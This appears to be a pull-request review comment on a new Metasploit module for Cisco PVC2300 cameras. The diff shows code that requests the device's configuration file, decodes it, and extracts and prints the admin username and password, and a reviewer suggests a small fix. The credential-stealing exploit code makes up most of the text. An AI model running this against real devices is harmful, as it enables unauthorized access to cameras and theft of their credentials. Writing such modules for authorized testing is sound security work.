modules/auxiliary/gather/cisco_pvc2300_download_config.rb

```diff
@@ -0,0 +1,226 @@
+    end
+  end
+
+  def download_config_file(session_id)
+    vprint_status('Attempting to download the configuration file')
+
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'oamp', 'System.xml'),
+      'headers' => {
+        'sessionID' => session_id
+      },
+      'vars_get' => {
+        'action' => 'downloadConfigurationFile'
+      }
+    })
+
+    unless res
+      fail_with(Failure::Unknown, 'Connection failed when trying to download the configuration file')
+    end
+
+    unless res.code == 200 && !res.body.empty?
+      fail_with(Failure::NotVulnerable, 'Failed to obtain the configuration file')
+    end
+
+    # if the exploit doesn't work, the response body should be empty. So if we have anything, we can assume we're in business
+    res.body
+  end
+
+  def decode_config_file(config_file_encoded)
+    # if we've made it all the way here, this shouldn't break, but better safe than sorry
+    begin
+      config_file_base64 = config_file_encoded.tr(custom_base64_alphabet, default_base64_alphabet)
+      config_file_decoded = Base64.decode64(config_file_base64)
+    rescue StandardError => e
+      print_error('Encountered the following error when attempting to decode the configuration file:')
+      print_error(e)
+      fail_with(Failure::Unknown, 'Failed to decode the configuration file')
+    end
+
+    # let's just save the full config at this point
+    path = store_loot('ciscopvc.config', 'text/plain', rhost, config_file_decoded)
+    print_good('Successfully downloaded the configuration file')
+    print_status("Saving the full configuration file to #{path}")
+
+    # let's see if we can grab the device name from the config file
+    if config_file_decoded =~ /comment=.*? Video Camera/
+      device_name = config_file_decoded.scan(/comment=(.*?)$/)&.flatten&.first&.strip
+      unless device_name.blank?
+        print_status("Obtained device name #{device_name}")
+      end
+    end
+
+    # try to grab the admin username and password from the config file
+    admin_name = nil
+    admin_password = nil
+    if config_file_decoded.include?('admin_name')
+      admin_name = config_file_decoded.scan(/admin_name=(.*?)$/)&.flatten&.first&.strip
+    end
+
+    if config_file_decoded.include?('admin_password')
+      admin_password = config_file_decoded.scan(/admin_password=(.*?)$/)&.flatten&.first&.strip
+    end
+
+    if admin_name.blank? && admin_password.blank?
+      print_error('Failed to obtain the admin credentials from the configuration file')
+    else
+      print_good('Obtained the following admin credentials for the web interface from the configuration file:')
+      print_status("admin username: #{admin_name}")
+      print_status("admin password: #{admin_password}")
+    end
+
+    # save the creds to the db
+    report_creds(admin_name, admin_password)
```

Comment:
Only makes sense to report these if they're found.


```suggestion
```suggestion
    else
      print_good('Obtained the following admin credentials for the web interface from the configuration file:')
      print_status("admin username: #{admin_name}")
      print_status("admin password: #{admin_password}")
      # save the creds to the db
      report_creds(admin_name, admin_password)
    end
```

Reply:
nice catch! fixed this now